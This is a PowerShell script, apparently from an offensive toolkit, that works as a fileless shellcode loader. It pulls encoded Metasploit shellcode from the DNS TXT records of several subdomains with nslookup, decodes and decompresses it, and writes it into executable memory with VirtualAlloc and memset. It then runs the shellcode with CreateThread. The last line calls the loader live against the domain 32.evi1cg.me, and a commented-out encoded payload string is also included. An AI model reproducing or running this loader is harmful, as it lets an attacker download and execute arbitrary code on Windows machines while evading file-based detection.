function Execute-Code
{
<#
.PARAMETER Shelldomain
The domain (or subdomain) whose subbdomain's TXT records would hold shellcode.
.PARAMETER subdomains
The number of subdomains which would be used to provide shellcode from their TXT records.
 .PARAMETER AUTHNS
Authoritative Name Server for the domains.
.EXAMPLE
PS > Execute-Code
The payload will ask for all required options.

.EXAMPLE
PS > Execute-Code -Shelldomain 32.alteredsecurity.com -SubDomains 5 -AUTHNS f1g1ns2.dnspod.net.
Use above from non-interactive shell.
#>
	[CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $Shelldomain,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Subdomains,
        
        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $AUTHNS

    )
	function Get-ShellCode
    {
		Param(
            [Parameter()]
            [String]
            $Shelldomain
        )
        $i = 1
        while ($i -le $subdomains)
        {
            $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$Shelldomain $AUTHNS") 
            $temp = $getcommand | select-string -pattern "`""
            $tmp1 = ""
            $tmp1 = $tmp1 + $temp
            $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
            $i++
        }
	    #$encdata = "jVQ7cqUwEMy3ynd4gTMTAPpB4MTXcDlAIJ3AW+W9/dINM2geiQOmhDSf7p6RPj/+fZfPr6/Ha/5bH++P/qeuXf9Tpt1M42765osw04zzsBs3vPxh2BviVnp4eOTdBPy6Xn+Ra73+2shBgxK8RtSu+5fTbvyCrchy2K9t5IKMDibiMGHFFFyg+Ir9Fdk2UxK7SF/gXkdBGJIBPBz420jiccrEYzWwOGAXhz2ssLUZgcKguWeBRy+nybA/HHnaSLfIId2c6sXwRpsOkpimXPS7hrVjDQBIaGRlijYuwb3Cy7Ev+B29+BeswqR0pjaUbsorRvGCUD5fMfBan3vSaGE46uB5TyS3giGL4SRQ4QDZgipDvsHMT6jidpRCzwsxgnCAiRQBsJwZWr0TOE8QNR1OnaT1cuoNTfpyoJMg2yBqhussQ8H0hiUYrV4SB63Ng4m/+Qy0l4TZI7WQmMjRLzCUt2iyZ4oj+PAiHvc+Su0n4w3Yc8vgLEBAttqMk3wbOScBy7sXWC9JjhkYFtBIVNfcr0vKCYbvEd0WKeXBk/0yNYu+eFGll+4u7cKM3RM06LSxR5NMQAPIXC7eK6IDHqc3hKujkKpmZB1aaCEafKwKs3A8TEG+1hea2dGjDT/IcD+1kb+h1gmj2wPC4SGoKJT9Xd3b4NAZgoz1HBnXm5qn6qYeZxt6+k0a2QQUMdxbb89HAb2kQZfhkwmKx/2Lt5p8T+mRAbkCacbBMtomGZqunf7/"
        $dec = [System.Convert]::FromBase64String($encdata)
        $ms = New-Object System.IO.MemoryStream
        $ms.Write($dec, 0, $dec.Length)
        $ms.Seek(0,0) | Out-Null
        $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object System.IO.StreamReader($cs)
        $sc = $sr.readtoend()
		return $sc
    }
	function Convert-HexStringToByteArray {
		[CmdletBinding()]
		Param ( [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [String] $String )
  		#Clean out whitespaces and any other non-hex crud.
		$String = $String.ToLower() -replace '[^a-f0-9\\\,x\-\:]',''
 		#Try to put into canonical colon-delimited format.
		$String = $String -replace '0x|\\x|\-|,',':'
		#Remove beginning and ending colons, and other detritus.
		$String = $String -replace '^:+|:+$|x|\\',''
		#Maybe there's nothing left over to convert...
		if ($String.Length -eq 0) { ,@() ; return } 
 		#Split string with or without colon delimiters.
		if ($String.Length -eq 1)
		{ ,@([System.Convert]::ToByte($String,16)) }
		elseif (($String.Length % 2 -eq 0) -and ($String.IndexOf(":") -eq -1))
		{ ,@($String -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}) }
		elseif ($String.IndexOf(":") -ne -1)
		{ ,@($String -split ':+' | foreach-object {[System.Convert]::ToByte($_,16)}) }
		else
		{ ,@() }
		#The strange ",@(...)" syntax is needed to force the output into an
		#array even if there is only one element in the output (or none).
	}
    $Shell = (Get-ShellCode $Shelldomain)
    #Remove unrequired things from msf shellcode
    $tmp = $Shell -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
    #[Byte[]]$sc =   Convert-HexStringToByteArray($tmp) 
    [Byte[]]$sc = $tmp -split ','
    #Code Execution logic
	$code = @"
	[DllImport("kernel32.dll")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	[DllImport("kernel32.dll")]
	public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	[DllImport("msvcrt.dll")]
	public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
    $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
	$size = 0x1000 
    if ($sc.Length -gt 0x1000) {$size = $sc.Length} 
    $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) 
    for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)}
	Try {
        $winFunc::CreateThread(0,0,$x,0,0,0)
        sleep 100000
		}
	Catch
	{
	[system.exception]
	"caught a system exception"
	}
}
Execute-Code -Shelldomain 32.evi1cg.me -subdomains 3 -AUTHNS f1g1ns2.dnspod.net